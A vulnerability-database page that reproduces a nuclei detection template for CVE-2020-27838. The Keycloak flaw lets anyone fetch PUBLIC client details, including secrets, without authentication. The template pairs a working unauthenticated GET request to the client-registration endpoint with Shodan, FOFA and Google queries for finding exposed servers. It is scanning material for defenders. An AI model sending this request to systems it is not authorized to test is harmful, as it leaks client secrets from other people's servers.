Lucene search
K

KeyCloak - Information Exposure

🗓️ 11 Jul 2026 02:59:56Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 88 Views

KeyCloak vulnerability allows unauthorized access to PUBLIC client info without authenticatio

Related
Refs
Code
ReporterTitlePublishedViews
Family
ArchLinux
[ASA-202105-6] keycloak: multiple issues
19 May 202100:00
archlinux
Circl
CVE-2020-27838
19 Jan 202409:03
circl
CNNVD
Red Hat Keycloak 授权问题漏洞
11 Dec 202000:00
cnnvd
CNVD
Unspecified vulnerability in Red Hat keycloak (CNVD-2021-19381)
12 Jan 202100:00
cnvd
CVE
CVE-2020-27838
8 Mar 202121:41
cve
Cvelist
CVE-2020-27838
8 Mar 202121:41
cvelist
Github Security Blog
Keycloak discloses information without authentication
24 May 202217:43
github
NVD
CVE-2020-27838
8 Mar 202122:15
nvd
OSV
CVE-2020-27838
8 Mar 202122:15
osv
OSV
GHSA-PCV5-M2WH-66J3 Keycloak discloses information without authentication
24 May 202217:43
osv
Rows per page
id: CVE-2020-27838

info:
  name: KeyCloak - Information Exposure
  author: mchklt
  severity: medium
  description: |
    A flaw was found in keycloak in versions prior to 13.0.0. The client registration endpoint allows fetching information about PUBLIC clients (like client secret) without authentication which could be an issue if the same PUBLIC client changed to CONFIDENTIAL later. The highest threat from this vulnerability is to data confidentiality.
  impact: |
    The vulnerability allows an attacker to gain sensitive information from the KeyCloak server.
  remediation: |
    Apply the latest security patches or updates provided by the KeyCloak vendor.
  reference:
    - https://bugzilla.redhat.com/show_bug.cgi?id=1906797
    - https://nvd.nist.gov/vuln/detail/CVE-2020-27838
    - https://github.com/muneebaashiq/MBProjects
    - https://github.com/j4k0m/godkiller
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2020-27838
    cwe-id: CWE-287
    epss-score: 0.17943
    epss-percentile: 0.96831
    cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: redhat
    product: keycloak
    shodan-query:
      - "title:\"keycloak\""
      - http.title:"keycloak"
      - http.html:"keycloak"
      - http.favicon.hash:-1105083093
    fofa-query:
      - title="keycloak"
      - icon_hash=-1105083093
      - body="keycloak"
    google-query: intitle:"keycloak"
  tags: cve,cve2020,keycloak,exposure,redhat,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/auth/realms/master/clients-registrations/default/security-admin-console"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '"clientId":\s*"security-admin-console"'
          - '"secret":'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a0bf340ac310f1128bf715d355d40475cd852448c1e59b90923807b99aaac51902204dc90061d06abde0a58abc605c8ac71dd8c52650e9926b1aa1e04d9623410483:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 24.3
CVSS 3.16.5
EPSS0.17943
88